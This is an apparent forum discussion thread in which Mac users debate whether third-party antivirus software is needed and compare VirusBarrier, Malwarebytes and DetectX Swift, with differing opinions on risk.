Malware Scanning

I often hear people refer to third party commercial anti-virus software as “insurance”. The thing is, you don’t always need insurance. Not all possible eventualities are equal. When that volcano insurance salesman comes by, you may not want to give him or her a lot of your time…or money.

Here’s the deal. I don’t want anyone to get the impression that there is no malware for the Macintosh, or that I’m saying that there is none. I haven’t counted manually, but the archive of Mac malware examples that the consortium of anti-virus software manufacturers use has less than 200 examples, all of which have accrued since the advent of OS X, over 20 years ago. The thing is that just about all of those examples, at this time, either don’t work, or they don’t exist in the wild anymore, or the Macintosh has been hardened against them, or a combination of these. There just isn’t a lot of malware for the Macintosh. (The popular press has folks scared to death about malware. But that’s because they are talking about Windows, not the Mac. There are over a BILLION examples of malware for Windows. Windows users SHOULD be scared. But the Macintosh isn’t Windows.)

It isn’t that the Macintosh is “invulnerable”, it is that writing malware for the Macintosh is very hard… and expensive.

Modern malware is almost exclusively written for financial gain. (With the odd bit of malware written to target a particular socio-political group, usually in the far east. These exploits usually aren’t seen in the west.) Whether it is to serve up ads, or to scam users out of their money, it is all about a profit motive.

The Mac isn’t easy to write malware for. The Mac OS was designed for security, and Apple has been adding more and more layers of security with each new version over the past 20+ years. So, it takes a significant amount of time and money to write viable malware for the Macintosh. It’s not an endeavor for sociopathic teens with too much time on their hands as it often is for Windows. This means that it will take months to push out a new exploit for the Mac, representing a large investment in time and money. (I’ve heard speculation that it might take millions of dollars to write some types of common malware for the Mac.)

So, the bad guys need to create malware that will bring a large return on investment that will recoup their costs, and then some. The thing is, Apple has shown that they will reasonably quickly harden the Macintosh to any new malware. Plus, since it apparently has proven to be exceedingly difficult to write actual viruses (i.e. self-propagating/disseminating malware) for the Mac, any malware written for the Mac will almost certainly be a Trojan Horse that will be very difficult to disseminate to a large audience (because it is very difficult to spread a Trojan Horse anonymously and avoid prison) before the source that is disseminating it is discovered and shut down.

What that all means is that even if the bad guys can write effective malware for the Mac, it might turn out in the end that the entire endeavor is a money loser for them. This tends to make the Macintosh an unattractive target for creating sophisticated malware for. As a result, we don’t see a lot of malware written for the Macintosh.

I want to note that I’m on about half a dozen large Macintosh discussion forums. These comprise well over a quarter million Mac users. NO ONE on these forums is complaining about losing data or money to some virulent malicious malware, or any other sort of security breach. Ironically, the closest thing to that I see is a few people have been experiencing scary notifications imploring them to renew fictitious subscriptions to McAfee AV software.

If you are paranoid, and you feel that Apple’s built-in security features aren’t sufficient, I’ve already mentioned earlier in this thread several excellent tools that you can use to assuage your fears…all of which are free. You don’t need to be cheated out of your money by some company that makes Windows anti-virus software which they have crudely ported to the Macintosh.

Targeted malware does seem to be more prevalent today than in the past. And I disagree that the Mac is an unattractive target - the profile of Apple users seems to be that they have money, or they have access to information.

But, malware isn’t just going after your money although that’s the primary driver. If you deal with PII, industrial or government secrets, or financial information, that’s valuable too. You also can’t dismiss the use of your system to “springboard” to other targets (within your employer).

Then there’s “state sponsored surveillance” - although in practice most of us don’t have to worry about that, but if you’re a political dissident you could be a target. Or if you are a govenment official. Or military. Or defense contractor.

You’re correct that you have to asses your own level of risk (based on not only what you own but what data you have access to). If that level of assessment leads you to find that you need more thorough protection, you need to look at:

• Reducing the attack surface of the system. That involves disabling unnecessary services, no sharing, control admin access, and controlling at the system level that only certain things can get executed. Apple’s built in defenses work at this level, but don’t catch everything (riddle me this: why do we have zero-day exploits if these defenses were 100% effective).

• Use AV software that does active scanning as items are downloaded to the system. You can’t rely on software that only does intermittent scanning. It’s like locking the barn door after the horse escapes. Malware usually doesn’t wait to activate itself - by the time you decided to start a manual scan (or wait for your scheduled scan to run), you may have already been compromised. Your “scan” process now becomes a search and destroy, or in the case of ransomware, restoration process.

Defense in depth - that’s what I’ve always been taught from a security best practice. Assess risk and select the best tools. That may mean using multiple tools (network controls, firewalls, AV, etc). And don’t forget the human aspect - many times it’s the loose nut holding the wheel that’s the biggest problem.

No disagreement here, but I’d point out that for most people, this high-value information belongs to their employers.

Nobody should be putting corporate data on personal computers, and most corporations have policies that explicitly forbid it. And a major reason for policies like this is that these same corporations have IT policies that are much more restrictive than people would want to have on their personal computers.

I think that a corporate IT department needs to be extremely paranoid. But ordinary people under ordinary circumstances shouldn’t have to be. But they shouldn’t be putting sensitive documents on less-secure computers either.

Agreed 100%. The misguided ”bring your own device” mandated (employers trying to cut costs by requiring tools but not paying for them) and work from home trends are making this more likely to happen, though - corporate policies or not.

But that’s a training and awareness issue on both employees and companies.

There is, I think, an elephant here, something that continuously fails to be addressed: how to recover from accidents. And especially unknown accidents, the ones you didn’t know you had. All the discussion on malware/adware seems to set such a high bar: that people will of course be diligent, cautious and conscientious and “there’s no reason to worry if you’re halfway not an idiot,” etc.

This is not real world thinking. Accidents do happen using computers just as they do driving vehicles. Over time, they will happen. Some machines and systems are more robust than others, but accidents… Driver error, or a lapse of attention, or going too fast, is a real thing.

So what about people who might have made a mistake, who might have accidentally allowed access to their computer and that person wasn’t as careful (e.g., as happens in families)? At work we build plenty of fail-safes and security traps; not so at home. Granted, a company is not lost or big bucks or data breach, but what kind of thinking is that? A company is more important than an individual or single family?

Authors of general-public articles and the resulting correspondence often adopt such ivory-castle positions, or “speaking to the choir,” getting carried away mildly chastising each other but ignoring what isn’t being addressed: that life has accidents (professional life not excluded). People make mistakes. Insurance is nice but so are mechanics and auto body shops.

So those are the situations when you want to use programs such as Randy2 so helpfully suggests here.

Yes, we are all human and we will make mistakes, especially when we are in a rush, distracted, or tired. Relying on constant vigilance as protection requires perfection. I don’t think any of us can reach that standard very often, especially with something that is constantly changing and morphing.

For that reason, some people choose to run Intego’s free version of Virus Barrier daily, or weekly, or monthly, depending on how insecure they are. Yet I never hear reports of anyone having found that something serious slipped through.

I know that malware is a very big issue for some folks. It’s hard to ignore the fact that there are over a BILLION pieces of malware for Windows. That entire offices are sometimes ravaged by Windows malware. That’s scary stuff. But, really, the Macintosh is not Windows. The Mac has only a relative handful of malware, just about none of which is a threat at this time.

But if you are paranoid, Intego’s free version of Virus Barrier is right there. Use it as often as you care to, to assure yourself that your Mac is just fine. Set it to run daily if you like. Since it isn’t fully interactive, it won’t slow down your Mac like many commercial anti-virus programs will. And it’s not costing you anything. So go ahead and use it. You don’t have to keep coming up with rationalizations why you feel that you need more protection than the OS itself offers. No one blames you for being concerned, we understand.

VirusBarrier Free Edition (free)
https://itunes.apple.com/us/app/VirusBarrier-Scanner/id1200445649

Better still, purchase the Intego program. It is well worth the cost. I have used if ro years and sleep well at night knowing it is working lol. Also, I have had just a couple of times over the years where it has caught something and allowed me to delete the questionable item. That item was nothing I had intentionally downloaded but was something attached to a document or program I had downloaded. They are fantastic and their regular updates and informational e-mails are very helpful to me. I figure my subscription helps to fund their excellent work.

Lots of good information in this thread so thanks to all who have contributed! TidBITS comes through again

I agree that it is an excellent program. It is one of the very few anti-virus programs that comes from a company that specializes in Macintosh software, and really understands the Mac. And it has won all of the believable shootouts that I’ve seen from reputable sources.

However, I’ve been using the commercial version for over 20 years (not because I think that I need it. I don’t think that I do at all. But I work in a profession that requires me to use “bests efforts” to protect client data). In all that time it has never “saved” me from anything that I needed saving from. The threats just aren’t out there that require one to throw money at protection. The free version of Virus Barrier is already more than what one needs.

That said, I know that there are folks who are dying to buy a commercial anti-virus program, no matter what argument you make about them not needing one. For those folks, Intego’s Virus Barrier is the best choice. It’s on sale for $70 (for one year) right now:

https://www.intego.com/

I believe the same could be said for Malwarebytes (free version). Could you comment on pros and cons between these two for somebody who comes from “I’m careful and not at risk, but every once in a while I like some assurance”?

This is a touchy subject, because I personally don’t trust Malwarebytes. Others will strenuously defend the product, but they haven’t been able to change my perception.

The short and inarguable answer is that all of the believable anti-virus comparison tests have Virus Barrier at the very top, and Malwarebytes somewhere lower. Sometimes quite a bit lower.

https://www.macworld.com/article/668850/best-mac-antivirus-software.html

Personally, I don’t like some of Malwarebytes past dishonest advertising, I don’t like that at least some versions of Malwarebytes install adware to hawk their commercial version (I was getting pop-ups for their commercial version). The fact that Malwarebytes installs a large number of files deep in your system (I counted 22 different files that EasyFind uncovered in mine; what might they all be doing?). And the fact that the product would do a scan of my half full 1TB rotating disk hard drive in about 17 seconds, yet they claim that the product does a comprehensive scan looking everywhere for malware (which sounds physically impossible; other products will take up to several hours to do the same. My suspicion is that the product only does a superficial scan looking for certain file names in certain locations.)

I also don’t like that Malwarebytes has removed the last comparison test that I really trusted from the Web, as they purchased TheSafeMac’s IP. But you can still call it up from here:

https://web.archive.org/web/20230909150005/http://www.thesafemac.com/mac-anti-virus-testing-2014/
(Scroll down to the table showing the effectiveness of each product. Note that Virus Barrier is at the top.)

Malwarebytes does an excellent job with adware, which traditional AV products, and even Apple’s own security software, often don’t. But since I don’t recommend Malwarebytes myself, in the rare event that you find yourself plagued with adware, I recommend this almost identical free product instead:

DetectX Swift (free)
https://sqwarq.com/detectx/

I think this statement is based on a misunderstanding. Malwarebytes has never claimed to do a “comprehensive scan looking everywhere”. On the Mac platform, they only scan the locations known to be attacked by the malware in their database.

See: Malwarebytes support: Why Malwarebytes scans so fast on Mac devices

You may not agree with this policy (I assume you do not), but it is not trying to scan every file and reviewers should not assume otherwise.

Exactly. Even though the product is marketed as a comprehensive anti-malware product (or, at least, it has been previously), the product only seems to be doing a very superficial scan for a limited set of malware based on likely very limited parameters. It isn’t a really a comprehensive product like Virus Barrier.

Which is not to say that the product doesn’t do anything, or that it isn’t nice considering that it is a free product. It just isn’t nearly as good (i.e. comprehensive and effective) a free product as Virus Barrier is. Which is the answer to the question that Simon asked.

I think this is a matter of opinion.

I think they would argue that a piece of malicious code that isn’t installed (e.g. a malicious browser add-on that isn’t installed in your browser) is not dangerous, so there’s no point in scanning for it in other locations.

And yes, the (also completely valid) counter-arguments are:

• They need to keep up to date about the various contexts (browsers, office suites, etc.) where malware might run. These locations change over time as apps change.
• Malware stored in a generic file may not be able to run, but you should still know about it, since it may be possible for you to spread it to others (perhaps on other operating systems) even if it can’t hurt you directly.

Whether or not this matters is going to depend on your particular requirements and opinions. While I may consider a policy like this fine for my personal computer, I may consider it woefully inadequate for someone who is less careful, or as a corporate IT policy or for a computer that is more likely to be targeted for attack.

My counter argument is that it would be trivially easy for the sociopaths who write malware to totally bypass having Malwarebytes flag their malware by simply changing it’s name or stashing it somewhere else.

Given that the Mac OS already looks for and protects against malware, anyone who is interested in a third party product is likely going to want something that offers protection over and above what is already provided by Apple. Malwarebytes is not such a product; it only does a limited, superficial job. Fortunately there is another free product that does a very comprehensive job: Virus Barrier.

I just don’t see any of your rationalizations for Malwarebytes limitations (not to mention my other concerns, as mentioned previously) as convincing that the product fills a niche for anyone who is seriously concerned about malware.

I don’t see any point to arguing about this any further. I think that folks have enough information to make up their own minds.

Yep, let’s shut this down—we’ve covered the topic thoroughly.